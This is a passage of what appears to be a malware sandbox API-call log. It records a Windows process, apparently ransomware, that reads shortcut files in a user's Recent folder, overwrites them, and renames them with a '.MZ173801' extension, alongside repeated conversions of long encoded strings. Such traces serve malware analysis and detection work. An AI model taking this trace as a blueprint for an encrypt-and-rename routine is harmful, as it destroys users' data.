lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.703] GetCurrentThreadId () returned 0x1358 [0107.703] GetCurrentThreadId () returned 0x1358 [0107.703] GetCurrentThreadId () returned 0x1358 [0107.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.704] GetCurrentThreadId () returned 0x1358 [0107.704] GetCurrentThreadId () returned 0x1358 [0107.704] GetCurrentThreadId () returned 0x1358 [0107.704] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E5xn1.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\e5xn1.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.241] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.241] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.241] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x440 [0108.241] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.241] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x440, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x440, lpOverlapped=0x0) returned 1 [0108.242] CloseHandle (hObject=0x3f4) returned 1 [0108.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E5xn1.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\e5xn1.ots.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.243] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x440, lpOverlapped=0x0) returned 1 [0108.245] CloseHandle (hObject=0x3f4) returned 1 [0108.246] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E5xn1.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\e5xn1.ots.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E5xn1.ots.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\e5xn1.ots.lnk.mz173801")) returned 1 [0108.251] GetCurrentThreadId () returned 0x1358 [0108.251] GetCurrentThreadId () returned 0x1358 [0108.251] GetCurrentThreadId () returned 0x1358 [0108.251] GetCurrentThreadId () returned 0x1358 [0108.251] GetCurrentThreadId () returned 0x1358 [0108.251] GetCurrentThreadId () returned 0x1358 [0108.251] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e13028, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75e13028, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75e13028, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EIGtc7lwmfk.lnk", cAlternateFileName="EIGTC7~1.LNK")) returned 1 [0108.251] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.252] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EIGtc7lwmfk.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eigtc7lwmfk.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e13028, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75e13028, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75e13028, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3bf)) returned 1 [0108.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.253] GetCurrentThreadId () returned 0x1358 [0108.253] GetCurrentThreadId () returned 0x1358 [0108.253] GetCurrentThreadId () returned 0x1358 [0108.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.254] GetCurrentThreadId () returned 0x1358 [0108.254] GetCurrentThreadId () returned 0x1358 [0108.254] GetCurrentThreadId () returned 0x1358 [0108.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EIGtc7lwmfk.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eigtc7lwmfk.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.254] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.254] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.254] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3bf [0108.254] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.254] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3bf, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3bf, lpOverlapped=0x0) returned 1 [0108.255] CloseHandle (hObject=0x3f4) returned 1 [0108.255] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EIGtc7lwmfk.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eigtc7lwmfk.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.256] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3bf, lpOverlapped=0x0) returned 1 [0108.258] CloseHandle (hObject=0x3f4) returned 1 [0108.259] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EIGtc7lwmfk.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eigtc7lwmfk.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EIGtc7lwmfk.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eigtc7lwmfk.lnk.mz173801")) returned 1 [0108.259] GetCurrentThreadId () returned 0x1358 [0108.259] GetCurrentThreadId () returned 0x1358 [0108.259] GetCurrentThreadId () returned 0x1358 [0108.259] GetCurrentThreadId () returned 0x1358 [0108.259] GetCurrentThreadId () returned 0x1358 [0108.259] GetCurrentThreadId () returned 0x1358 [0108.259] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea257de6, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea257de6, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea257de6, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3e5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="eiwjZXFfC09j.lnk", cAlternateFileName="EIWJZX~1.LNK")) returned 1 [0108.259] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.260] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eiwjZXFfC09j.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eiwjzxffc09j.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea257de6, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea257de6, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea257de6, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3e5)) returned 1 [0108.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 